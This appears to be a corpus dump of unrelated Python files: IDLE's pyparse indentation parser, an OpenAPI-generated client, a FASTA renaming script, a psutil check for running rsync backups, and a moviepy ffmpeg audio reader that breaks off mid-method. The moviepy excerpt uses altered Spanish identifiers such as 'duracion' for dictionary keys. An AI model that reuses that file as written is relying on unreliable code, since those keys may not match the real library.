[^\s#\\] # if we match, m.end()-1 is the interesting char
""", re.VERBOSE).match
# Match start of statements that should be followed by a dedent.
_closere = re.compile(r"""
\s*
(?: return
| break
| continue
| raise
| pass
)
\b
""", re.VERBOSE).match
# Chew up non-special chars as quickly as possible. If match is
# successful, m.end() less 1 is the index of the last boring char
# matched. If match is unsuccessful, the string starts with an
# interesting char.
_chew_ordinaryre = re.compile(r"""
[^[\](){}#'"\\]+
""", re.VERBOSE).match
class ParseMap(dict):
r"""Dict subclass that maps anything not in dict to 'x'.
This is designed to be used with str.translate in study1.
Anything not specifically mapped otherwise becomes 'x'.
Example: replace everything except whitespace with 'x'.
>>> keepwhite = ParseMap((ord(c), ord(c)) for c in ' \t\n\r')
>>> "a + b\tc\nd".translate(keepwhite)
'x x x\tx\nx'
"""
# Calling this triples access time; see bpo-32940
def __missing__(self, key):
return 120 # ord('x')
# Map all ascii to 120 to avoid __missing__ call, then replace some.
trans = ParseMap.fromkeys(range(128), 120)
trans.update((ord(c), ord('(')) for c in "({[") # open brackets => '(';
trans.update((ord(c), ord(')')) for c in ")}]") # close brackets => ')'.
trans.update((ord(c), ord(c)) for c in "\"'\\\n#") # Keep these.
class Parser:
def __init__(self, indentwidth, tabwidth):
self.indentwidth = indentwidth
self.tabwidth = tabwidth
def set_code(self, s):
assert len(s) == 0 or s[-1] == '\n'
self.code = s
self.study_level = 0
def find_good_parse_start(self, is_char_in_string=None,
_synchre=_synchre):
"""
Return index of a good place to begin parsing, as close to the
end of the string as possible. This will be the start of some
popular stmt like "if" or "def". Return None if none found:
the caller should pass more prior context then, if possible, or
if not (the entire program text up until the point of interest
has already been tried) pass 0 to set_lo().
This will be reliable iff given a reliable is_char_in_string()
function, meaning that when it says "no", it's absolutely
guaranteed that the char is not in a string.
"""
code, pos = self.code, None
if not is_char_in_string:
# no clue -- make the caller pass everything
return None
# Peek back from the end for a good place to start,
# but don't try too often; pos will be left None, or
# bumped to a legitimate synch point.
limit = len(code)
for tries in range(5):
i = code.rfind(":\n", 0, limit)
if i < 0:
break
i = code.rfind('\n', 0, i) + 1 # start of colon line (-1+1=0)
m = _synchre(code, i, limit)
if m and not is_char_in_string(m.start()):
pos = m.start()
break
limit = i
if pos is None:
# Nothing looks like a block-opener, or stuff does
# but is_char_in_string keeps returning true; most likely
# we're in or near a giant string, the colorizer hasn't
# caught up enough to be helpful, or there simply *aren't*
# any interesting stmts. In any of these cases we're
# going to have to parse the whole thing to be sure, so
# give it one last try from the start, but stop wasting
# time here regardless of the outcome.
m = _synchre(code)
if m and not is_char_in_string(m.start()):
pos = m.start()
return pos
# Peeking back worked; look forward until _synchre no longer
# matches.
i = pos + 1
while 1:
m = _synchre(code, i)
if m:
s, i = m.span()
if not is_char_in_string(s):
pos = s
else:
break
return pos
def set_lo(self, lo):
""" Throw away the start of the string.
Intended to be called with the result of find_good_parse_start().
"""
assert lo == 0 or self.code[lo-1] == '\n'
if lo > 0:
self.code = self.code[lo:]
def _study1(self):
"""Find the line numbers of non-continuation lines.
As quickly as humanly possible <wink>, find the line numbers (0-
based) of the non-continuation lines.
Creates self.{goodlines, continuation}.
"""
if self.study_level >= 1:
return
self.study_level = 1
# Map all uninteresting characters to "x", all open brackets
# to "(", all close brackets to ")", then collapse runs of
# uninteresting characters. This can cut the number of chars
# by a factor of 10-40, and so greatly speed the following loop.
code = self.code
code = code.translate(trans)
code = code.replace('xxxxxxxx', 'x')
code = code.replace('xxxx', 'x')
code = code.replace('xx', 'x')
code = code.replace('xx', 'x')
code = code.replace('\nx', '\n')
# Replacing x\n with \n would be incorrect because
# x may be preceded by a backslash.
# March over the squashed version of the program, accumulating
# the line numbers of non-continued stmts, and determining
# whether & why the last stmt is a continuation.
continuation = C_NONE
level = lno = 0 # level is nesting level; lno is line number
self.goodlines = goodlines = [0]
push_good = goodlines.append
i, n = 0, len(code)
while i < n:
ch = code[i]
i = i+1
# cases are checked in decreasing order of frequency
if ch == 'x':
continue
if ch == '\n':
lno = lno + 1
if level == 0:
push_good(lno)
# else we're in an unclosed bracket structure
continue
if ch == '(':
level = level + 1
continue
if ch == ')':
if level:
level = level - 1
# else the program is invalid, but we can't complain
continue
if ch == '"' or ch == "'":
# consume the string
quote = ch
if code[i-1:i+2] == quote * 3:
quote = quote * 3
firstlno = lno
w = len(quote) - 1
i = i+w
while i < n:
ch = code[i]
i = i+1
if ch == 'x':
continue
if code[i-1:i+w] == quote:
i = i+w
break
if ch == '\n':
lno = lno + 1
if w == 0:
# unterminated single-quoted string
if level == 0:
push_good(lno)
break
continue
if ch == '\\':
assert i < n
if code[i] == '\n':
lno = lno + 1
i = i+1
continue
# else comment char or paren inside string
else:
# didn't break out of the loop, so we're still
# inside a string
if (lno - 1) == firstlno:
# before the previous \n in code, we were in the first
# line of the string
continuation = C_STRING_FIRST_LINE
else:
continuation = C_STRING_NEXT_LINES
continue # with outer loop
if ch == '#':
# consume the comment
i = code.find('\n', i)
assert i >= 0
continue
assert ch == '\\'
assert i < n
if code[i] == '\n':
lno = lno + 1
if i+1 == n:
continuation = C_BACKSLASH
i = i+1
# The last stmt may be continued for all 3 reasons.
# String continuation takes precedence over bracket
# continuation, which beats backslash continuation.
if (continuation != C_STRING_FIRST_LINE
and continuation != C_STRING_NEXT_LINES and level > 0):
continuation = C_BRACKET
self.continuation = continuation
# Push the final line number as a sentinel value, regardless of
# whether it's continued.
assert (continuation == C_NONE) == (goodlines[-1] == lno)
if goodlines[-1] != lno:
push_good(lno)
def get_continuation_type(self):
self._study1()
return self.continuation
def _study2(self):
"""
study1 was sufficient to determine the continuation status,
but doing more requires looking at every character. study2
does this for the last interesting statement in the block.
Creates:
self.stmt_start, stmt_end
slice indices of last interesting stmt
self.stmt_bracketing
the bracketing structure of the last interesting stmt; for
example, for the statement "say(boo) or die",
stmt_bracketing will be ((0, 0), (0, 1), (2, 0), (2, 1),
(4, 0)). Strings and comments are treated as brackets, for
the matter.
self.lastch
last interesting character before optional trailing comment
self.lastopenbracketpos
if continuation is C_BRACKET, index of last open bracket
"""
if self.study_level >= 2:
return
self._study1()
self.study_level = 2
# Set p and q to slice indices of last interesting stmt.
code, goodlines = self.code, self.goodlines
i = len(goodlines) - 1 # Index of newest line.
p = len(code) # End of goodlines[i]
while i:
assert p
# Make p be the index of the stmt at line number goodlines[i].
# Move p back to the stmt at line number goodlines[i-1].
q = p
for nothing in range(goodlines[i-1], goodlines[i]):
# tricky: sets p to 0 if no preceding newline
p = code.rfind('\n', 0, p-1) + 1
# The stmt code[p:q] isn't a continuation, but may be blank
# or a non-indenting comment line.
if _junkre(code, p):
i = i-1
else:
break
if i == 0:
# nothing but junk!
assert p == 0
q = p
self.stmt_start, self.stmt_end = p, q
# Analyze this stmt, to find the last open bracket (if any)
# and last interesting character (if any).
lastch = ""
stack = [] # stack of open bracket indices
push_stack = stack.append
bracketing = [(p, 0)]
while p < q:
# suck up all except ()[]{}'"#\\
m = _chew_ordinaryre(code, p, q)
if m:
# we skipped at least one boring char
newp = m.end()
# back up over totally boring whitespace
i = newp - 1 # index of last boring char
while i >= p and code[i] in " \t\n":
i = i-1
if i >= p:
lastch = code[i]
p = newp
if p >= q:
break
ch = code[p]
if ch in "([{":
push_stack(p)
bracketing.append((p, len(stack)))
lastch = ch
p = p+1
continue
if ch in ")]}":
if stack:
del stack[-1]
lastch = ch
p = p+1
bracketing.append((p, len(stack)))
continue
if ch == '"' or ch == "'":
# consume string
# Note that study1 did this with a Python loop, but
# we use a regexp here; the reason is speed in both
# cases; the string may be huge, but study1 pre-squashed
# strings to a couple of characters per line. study1
# also needed to keep track of newlines, and we don't
# have to.
bracketing.append((p, len(stack)+1))
lastch = ch
p = _match_stringre(code, p, q).end()
bracketing.append((p, len(stack)))
continue
if ch == '#':
# consume comment and trailing newline
bracketing.append((p, len(stack)+1))
p = code.find('\n', p, q) + 1
assert p > 0
bracketing.append((p, len(stack)))
continue
assert ch == '\\'
p = p+1 # beyond backslash
assert p < q
if code[p] != '\n':
# the program is invalid, but can't complain
lastch = ch + code[p]
p = p+1 # beyond escaped char
# end while p < q:
self.lastch = lastch
self.lastopenbracketpos = stack[-1] if stack else None
self.stmt_bracketing = tuple(bracketing)
def compute_bracket_indent(self):
"""Return number of spaces the next line should be indented.
Line continuation must be C_BRACKET.
"""
self._study2()
assert self.continuation == C_BRACKET
j = self.lastopenbracketpos
code = self.code
n = len(code)
origi = i = code.rfind('\n', 0, j) + 1
j = j+1 # one beyond open bracket
# find first list item; set i to start of its line
while j < n:
m = _itemre(code, j)
if m:
j = m.end() - 1 # index of first interesting char
extra = 0
break
else:
# this line is junk; advance to next line
i = j = code.find('\n', j) + 1
else:
# nothing interesting follows the bracket;
# reproduce the bracket line's indentation + a level
j = i = origi
while code[j] in " \t":
j = j+1
extra = self.indentwidth
return len(code[i:j].expandtabs(self.tabwidth)) + extra
def get_num_lines_in_stmt(self):
"""Return number of physical lines in last stmt.
The statement doesn't have to be an interesting statement. This is
intended to be called when continuation is C_BACKSLASH.
"""
self._study1()
goodlines = self.goodlines
return goodlines[-1] - goodlines[-2]
def compute_backslash_indent(self):
"""Return number of spaces the next line should be indented.
Line continuation must be C_BACKSLASH. Also assume that the new
line is the first one following the initial line of the stmt.
"""
self._study2()
assert self.continuation == C_BACKSLASH
code = self.code
i = self.stmt_start
while code[i] in " \t":
i = i+1
startpos = i
# See whether the initial line starts an assignment stmt; i.e.,
# look for an = operator
endpos = code.find('\n', startpos) + 1
found = level = 0
while i < endpos:
ch = code[i]
if ch in "([{":
level = level + 1
i = i+1
elif ch in ")]}":
if level:
level = level - 1
i = i+1
elif ch == '"' or ch == "'":
i = _match_stringre(code, i, endpos).end()
elif ch == '#':
# This line is unreachable because the # makes a comment of
# everything after it.
break
elif level == 0 and ch == '=' and \
(i == 0 or code[i-1] not in "=<>!") and \
code[i+1] != '=':
found = 1
break
else:
i = i+1
if found:
# found a legit =, but it may be the last interesting
# thing on the line
i = i+1 # move beyond the =
found = re.match(r"\s*\\", code[i:endpos]) is None
if not found:
# oh well ... settle for moving beyond the first chunk
# of non-whitespace chars
i = startpos
while code[i] not in " \t\n":
i = i+1
return len(code[self.stmt_start:i].expandtabs(\
self.tabwidth)) + 1
def get_base_indent_string(self):
"""Return the leading whitespace on the initial line of the last
interesting stmt.
"""
self._study2()
i, n = self.stmt_start, self.stmt_end
j = i
code = self.code
while j < n and code[j] in " \t":
j = j + 1
return code[i:j]
def is_block_opener(self):
"Return True if the last interesting statement opens a block."
self._study2()
return self.lastch == ':'
def is_block_closer(self):
"Return True if the last interesting statement closes a block."
self._study2()
return _closere(self.code, self.stmt_start) is not None
def get_last_stmt_bracketing(self):
"""Return bracketing structure of the last interesting statement.
The returned tuple is in the format defined in _study2().
"""
self._study2()
return self.stmt_bracketing
if __name__ == '__main__':
from unittest import main
main('idlelib.idle_test.test_pyparse', verbosity=2)
|
py | b4001e0ff769c6d86baec1de9916d3bd42cdbd35 | # Copyright 2021 SpinQ Technology Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .backend import *
from .basic_simulator_backend import BasicSimulatorConfig
from .triangulum_backend import TriangulumConfig |
py | b4001e33f95ab1f28c83dd42a9456a2a59d024bf | # coding: utf-8
"""
OpenAPI Extension x-auth-id-alias
This specification shows how to use x-auth-id-alias extension for API keys. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import json
import atexit
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from x_auth_id_alias import rest
from x_auth_id_alias.configuration import Configuration
from x_auth_id_alias.exceptions import ApiValueError, ApiException
from x_auth_id_alias.model_utils import (
ModelNormal,
ModelSimple,
ModelComposed,
date,
datetime,
deserialize_file,
file_type,
model_to_dict,
str,
validate_and_convert_types
)
class ApiClient(object):
"""Generic API client for OpenAPI client library builds.
OpenAPI generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the OpenAPI
templates.
NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
# six.binary_type python2=str, python3=bytes
# six.text_type python2=unicode, python3=str
PRIMITIVE_TYPES = (
(float, bool, six.binary_type, six.text_type) + six.integer_types
)
_pool = None
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None, pool_threads=1):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
self.pool_threads = pool_threads
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'OpenAPI-Generator/1.0.0/python'
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
if self._pool:
self._pool.close()
self._pool.join()
self._pool = None
if hasattr(atexit, 'unregister'):
atexit.unregister(self.close)
@property
def pool(self):
"""Create thread pool on first request
avoids instantiating unused threadpool for blocking clients.
"""
if self._pool is None:
atexit.register(self.close)
self._pool = ThreadPool(self.pool_threads)
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None, _host=None,
_check_type=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = post_params if post_params else []
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
post_params.extend(self.files_parameters(files))
# body
if body:
body = self.sanitize_for_serialization(body)
# auth setting
self.update_params_for_auth(header_params, query_params,
auth_settings, resource_path, method, body)
# request url
if _host is None:
url = self.configuration.host + resource_path
else:
# use server/host defined in path or operation instead
url = _host + resource_path
try:
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
except ApiException as e:
e.body = e.body.decode('utf-8') if six.PY3 else e.body
raise e
content_type = response_data.getheader('content-type')
self.last_response = response_data
return_data = response_data
if not _preload_content:
return (return_data)
return return_data
if six.PY3 and response_type not in ["file", "bytes"]:
match = None
if content_type is not None:
match = re.search(r"charset=([a-zA-Z\-\d]+)[\s\;]?", content_type)
encoding = match.group(1) if match else "utf-8"
response_data.data = response_data.data.decode(encoding)
# deserialize response data
if response_type:
return_data = self.deserialize(
response_data,
response_type,
_check_type
)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is OpenAPI model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
elif isinstance(obj, ModelNormal) or isinstance(obj, ModelComposed):
# Convert model obj to dict
# Convert attribute name to json key in
# model definition for request
obj_dict = model_to_dict(obj, serialize=True)
elif isinstance(obj, ModelSimple):
return self.sanitize_for_serialization(obj.value)
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type, _check_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: For the response, a tuple containing:
valid classes
a list containing valid classes (for list schemas)
a dict containing a tuple of valid classes as the value
Example values:
(str,)
(Pet,)
(float, none_type)
([int, none_type],)
({str: (bool, str, int, float, date, datetime, str, none_type)},)
:param _check_type: boolean, whether to check the types of the data
received from the server
:type _check_type: bool
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == (file_type,):
content_disposition = response.getheader("Content-Disposition")
return deserialize_file(response.data, self.configuration,
content_disposition=content_disposition)
# fetch data from response object
try:
received_data = json.loads(response.data)
except ValueError:
received_data = response.data
# store our data under the key of 'received_data' so users have some
# context if they are deserializing a string and the data type is wrong
deserialized_data = validate_and_convert_types(
received_data,
response_type,
['received_data'],
True,
_check_type,
configuration=self.configuration
)
return deserialized_data
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None, _host=None,
_check_type=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async_req request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response_type: For the response, a tuple containing:
valid classes
a list containing valid classes (for list schemas)
a dict containing a tuple of valid classes as the value
Example values:
(str,)
(Pet,)
(float, none_type)
([int, none_type],)
({str: (bool, str, int, float, date, datetime, str, none_type)},)
:param files: key -> field name, value -> a list of open file
objects for `multipart/form-data`.
:type files: dict
:param async_req bool: execute request asynchronously
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:type collection_formats: dict, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _check_type: boolean describing if the data back from the server
should have its type checked.
:type _check_type: bool, optional
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout, _host,
_check_type)
return self.pool.apply_async(self.__call_api, (resource_path,
method, path_params,
query_params,
header_params, body,
post_params, files,
response_type,
auth_settings,
_return_http_data_only,
collection_formats,
_preload_content,
_request_timeout,
_host, _check_type))
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ApiValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def files_parameters(self, files=None):
"""Builds form parameters.
:param files: None or a dict with key=param_name and
value is a list of open file objects
:return: List of tuples of form parameters with file data
"""
if files is None:
return []
params = []
for param_name, file_instances in six.iteritems(files):
if file_instances is None:
# if the file field is nullable, skip None values
continue
for file_instance in file_instances:
if file_instance is None:
# if the file field is nullable, skip None values
continue
if file_instance.closed is True:
raise ApiValueError(
"Cannot read a closed file. The passed in file_type "
"for %s must be open." % param_name
)
filename = os.path.basename(file_instance.name)
filedata = file_instance.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([param_name, tuple([filename, filedata, mimetype])]))
file_instance.close()
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings,
resource_path, method, body):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
:param resource_path: A string representation of the HTTP request resource path.
:param method: A string representation of the HTTP request method.
:param body: A object representing the body of the HTTP request.
The object type is the return value of sanitize_for_serialization().
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if auth_setting['in'] == 'cookie':
headers['Cookie'] = auth_setting['value']
elif auth_setting['in'] == 'header':
if auth_setting['type'] != 'http-signature':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ApiValueError(
'Authentication token must be in `query` or `header`'
)
|
py | b40021058dac3c861f248c9ebfdc8e6913d539b4 | # %%
import os, sys
import pandas as pd
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
# %%
file_seq = sys.argv[1] #"output/16.alnta.divvy_RDRP_0.25_1081-1104.fasta"
file_list = sys.argv[2] #"original/merged-seq.acc-num.tsv"
dir = sys.argv[3] # "data/"
df_name = pd.read_csv(file_list, sep="\t", header=None)
df_name.columns = ["num", "seq_name"]
df_name["num"] = df_name["num"].astype(str)
l = []
for record in SeqIO.parse(file_seq, "fasta"):
num = record.id.split("_")[0]
pos = record.id.split("_")[1]
seq = record.seq
l.append([num, pos, seq])
df_seq = pd.DataFrame(l, columns=["num", "pos", "seq"])
df_rename = pd.merge(
df_name,
df_seq,
on="num",
how="inner"
)
# 拡張子なしのファイル名を取得
out = dir + "/" + os.path.splitext(os.path.basename(file_seq))[0] + ".full.fasta"
l_save = []
for i in df_rename.iterrows():
seq_r = SeqRecord(i[1].seq, id = i[1].seq_name + " " + i[1].pos)
l_save.append(seq_r)
SeqIO.write(l_save, out, "fasta")
# %%
|
py | b400222a40f032f8f317c32d47f16c566ceb5d64 | # -*- coding: utf-8 -*-
from simplespamblocker.tests.middleware import (
BlockMiddlewareValidProfileTests, BlockMiddlewareEmptyProfileTests,
BlockMiddlewareWithTemplateTests)
|
py | b400225d1862e5077ec9ada2dd7b10e59acca8ec | import psutil
from rest_framework import status
from rest_framework.response import Response
notify_Error = lambda msg: Response(msg, status=status.HTTP_400_BAD_REQUEST)
def bytes2human(n):
symbols = ("KB", "MB", "GB", "TB", "PB", "E", "Z", "Y")
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i + 1) * 10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return "%.1f%s" % (value, s)
return "%sB" % n
def any_backups_running():
matches = ["--server", "--partial-dir"]
for p in psutil.process_iter():
with p.oneshot():
if p.name() == "rsync":
if all(i in p.cmdline() for i in matches):
return True
return False
|
py | b40023ec6982624f9bd84f43c358274ee7a847e1 | import subprocess as sp
import re
import numpy as np
from moviepy.tools import cvsecs
from moviepy.video.io.ffmpeg_reader import ffmpeg_parse_infos
from moviepy.config import get_setting
import os
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
class FFMPEG_AudioReader:
"""
A class to read the audio in either video files or audio files
using ffmpeg. ffmpeg will read any audio and transform them into
raw data.
Parameters
------------
filename
Name of any video or audio file, like ``video.mp4`` or
``sound.wav`` etc.
buffersize
The tamano of the buffer to use. Should be bigger than the buffer
used by ``to_audiofile``
print_infos
Print the ffmpeg infos on the file being read (for debugging)
fps
Desired frames per second in the decoded signal that will be
received from ffmpeg
nbytes
Desired number of bytes (1,2,4) in the signal that will be
received from ffmpeg
"""
def __init__(self, filename, buffersize, print_infos=False,
fps=44100, nbytes=2, nchannels=2):
self.filename = filename
self.nbytes = nbytes
self.fps = fps
self.f = 's%dle'%(8*nbytes)
self.acodec = 'pcm_s%dle'%(8*nbytes)
self.nchannels = nchannels
infos = ffmpeg_parse_infos(filename)
self.duracion = infos['duracion']
if 'video_duration' in infos:
self.duracion = infos['video_duration']
else:
self.duracion = infos['duracion']
self.infos = infos
self.proc = None
self.nframes = int(self.fps * self.duracion)
self.buffersize= min( self.nframes+1, buffersize )
self.buffer= None
self.buffer_startframe = 1
self.initialize()
self.buffer_around(1)
def initialize(self, starttime = 0):
""" Opens the file, creates the pipe. """
self.close_proc() # if any
if starttime !=0 :
offset = min(1,starttime)
i_arg = ["-ss", "%.05f"%(starttime-offset),
'-i', self.filename, '-vn',
"-ss", "%.05f"%offset]
else:
i_arg = [ '-i', self.filename, '-vn']
cmd = ([get_setting("FFMPEG_BINARY")] + i_arg +
[ '-loglevel', 'error',
'-f', self.f,
'-acodec', self.acodec,
'-ar', "%d"%self.fps,
'-ac', '%d'%self.nchannels, '-'])
popen_params = {"bufsize": self.buffersize,
"stdout": sp.PIPE,
"stderr": sp.PIPE,
"stdin": DEVNULL}
if os.name == "nt":
popen_params["creationflags"] = 0x08000000
self.proc = sp.Popen( cmd, **popen_params)
self.pos = np.round(self.fps*starttime)
def skip_chunk(self,chunksize):
s = self.proc.stdout.read(self.nchannels*chunksize*self.nbytes)
self.proc.stdout.flush()
self.pos = self.pos+chunksize
def read_chunk(self,chunksize):
L = self.nchannels*chunksize*self.nbytes
s = self.proc.stdout.read(L)
dt = {1: 'int8',2:'int16',4:'int32'}[self.nbytes]
result = np.fromstring(s, dtype=dt)
result = (1.0*result / 2**(8*self.nbytes-1)).\
reshape((len(result)/self.nchannels,
self.nchannels))
#self.proc.stdout.flush()
self.pos = self.pos+chunksize
return result
def seek(self,pos):
"""
Reads a frame at time t. Note for coders: getting an arbitrary
frame in the video with ffmpeg can be painfully slow if some
decoding has to be done. This function tries to avoid fectching
arbitrary frames whenever possible, by moving between adjacent
frames.
"""
if (pos < self.pos) or (pos> (self.pos+1000000)):
t = 1.0*pos/self.fps
self.initialize(t)
elif pos > self.pos:
#print pos
self.skip_chunk(pos-self.pos)
# last case standing: pos = current pos
self.pos = pos
def close_proc(self):
if hasattr(self, 'proc') and self.proc is not None:
self.proc.terminate()
for std in [ self.proc.stdout,
self.proc.stderr]:
std.close()
del self.proc
def get_frame(self, tt):
buffersize = self.buffersize
if isinstance(tt,np.ndarray):
# lazy implementation, but should not cause problems in
# 99.99 % of the cases
# elements of t that are actually in the range of the
# audio file.
in_time = (tt>=0) & (tt < self.duracion)
# The np.round in the next line is super-important.
# Removing it results in artifacts in the noise.
frames = np.round((self.fps*tt)).astype(int)[in_time]
